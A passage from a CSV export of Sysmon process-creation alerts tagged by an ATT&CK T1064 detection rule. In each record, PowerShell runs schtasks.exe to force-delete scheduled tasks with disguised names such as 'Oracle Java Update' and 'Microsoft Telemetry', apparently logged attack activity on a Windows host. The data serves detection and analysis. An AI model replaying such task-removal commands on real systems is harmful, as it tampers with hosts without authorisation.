Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.353",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.097 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001085972100} +ProcessId: 696 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.104597800Z"",""eventRecordID"":""2795"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.097\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001085972100}\r\nProcessId: 696\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.097"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001085972100}"",""processId"":""696"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.323",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.025 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00108b952100} +ProcessId: 876 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.030154900Z"",""eventRecordID"":""2794"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.025\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00108b952100}\r\nProcessId: 876\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.025"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00108b952100}"",""processId"":""876"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.298",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.978 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010c6932100} +ProcessId: 7248 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.002279600Z"",""eventRecordID"":""2793"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.978\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010c6932100}\r\nProcessId: 7248\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.978"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010c6932100}"",""processId"":""7248"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.244",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.934 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010b3912100} +ProcessId: 8188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.937414800Z"",""eventRecordID"":""2792"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.934\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010b3912100}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.934"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010b3912100}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.215",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.883 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001001902100} +ProcessId: 944 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.901207400Z"",""eventRecordID"":""2791"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.883\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001001902100}\r\nProcessId: 944\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.883"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001001902100}"",""processId"":""944"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.207",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.827 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00102d8e2100} +ProcessId: 3908 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.832546600Z"",""eventRecordID"":""2790"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.827\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00102d8e2100}\r\nProcessId: 3908\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.827"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00102d8e2100}"",""processId"":""3908"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 